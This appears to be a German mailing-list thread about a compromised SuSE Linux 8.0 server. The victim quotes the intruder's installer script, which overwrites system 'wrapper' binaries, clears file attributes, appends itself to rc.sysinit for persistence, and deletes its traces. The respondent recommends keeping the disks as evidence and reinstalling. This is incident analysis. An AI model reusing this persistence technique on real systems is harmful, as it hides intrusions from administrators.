Peter Gloor wrote:
Unglücklicherweise habe ich heute nacht einen SuSE Linux 8.0 Professional Server offengelassen, d.h. SuSE Firewall 2 war vorübergehend nicht aktiviert.
hmm ... das alleine sollte noch kein problem sein.
Um 2 Uhr nachts hat dann einer zugeschlagen (Verzeichnis /mihai und Dateien wie /.mihai, /mihai.tgz, /mihai/inst etc.). Dabei wurde durch /mihai/inst die Datei /etc/rc.d/rc.sysinit (mit einem Aufruf von wrapper) überschrieben und es wurden die Daten /usr/bin/wrapper und /usr/sbin/wrapper mit der Datei /mihai überschrieben.
einer? auf welchem wege? wie ist er in dein system gekommen?
Ich bin mir nicht sicher, aber so wie es aussieht, wurden auch noch andere Dateien verändert/überschrieben (z.B. hat sendmail ein Änderungsdatum von heute nacht und ist wesentlich grösser als das Original).
und eventuell gibt es auch noch vieles mehr, dass du nur noch nicht siehst. http://www.chkrootkit.org/
Sicherheitshalber habe ich vor einem Reboot /usr/bin/wrapper und /usr/sbin/wrapper gelöscht.
zu wenig.
Jetzt kann ich den Rechner jedoch nicht mehr booten. Nach dem Monten der Dateisysteme kommen noch die Meldungen: mounting local filesystems proc on /proctyp proc (rw)
Danach passiert nichts mehr. Wie kriege ich jetzt die Kiste wieder in Gang?
gar nicht. sollte wirklich jemand in dein system eingedrungen sein, sichere alle partitionen als beweis und dann rechner plattmachen und neu aufsetzen. alles andere kann im zweifel unentdeckte löcher enthalten.
Es macht mir nichts aus, alles neu zu installieren, sofern mir dabei die Partitionen und vor allem das Filesystem auf hda3 intakt bleiben, da ich auf hda3 eine komplette Sicherung aller wichtigen Konfigurationsdateien und Datenfiles habe.
du hast nur keine ahnung, ob die daten auf hda3 nicht auch kompromitiert sind.
So sieht die Datei mihai/inst aus: --------------------------------------------------------------- #/bin/bash
echo "Start Daemon" sleep 1 ./kill
cp -f mihai /usr/bin/wrapper cp -f mihai /usr/sbin/wrapper
sleep 1 wrapper
chattr -AacdisSu /etc/rc.d/rc.sysinit echo >>/etc/rc.d/rc.sysinit "#Start Wrapper" echo >>/etc/rc.d/rc.sysinit wrapper
sleep 1 rm -rf mihai.tgz rm -rf mihai
echo "Done" ---------------------------------------------------------------
Kennt übrigens jemand diesen Virus?
ich nicht. da du aber davon sprichst, das auch dein sendmail-binary verändert ist, ist das obige eh nicht alles was in der nacht auf deinem system passiert ist. micha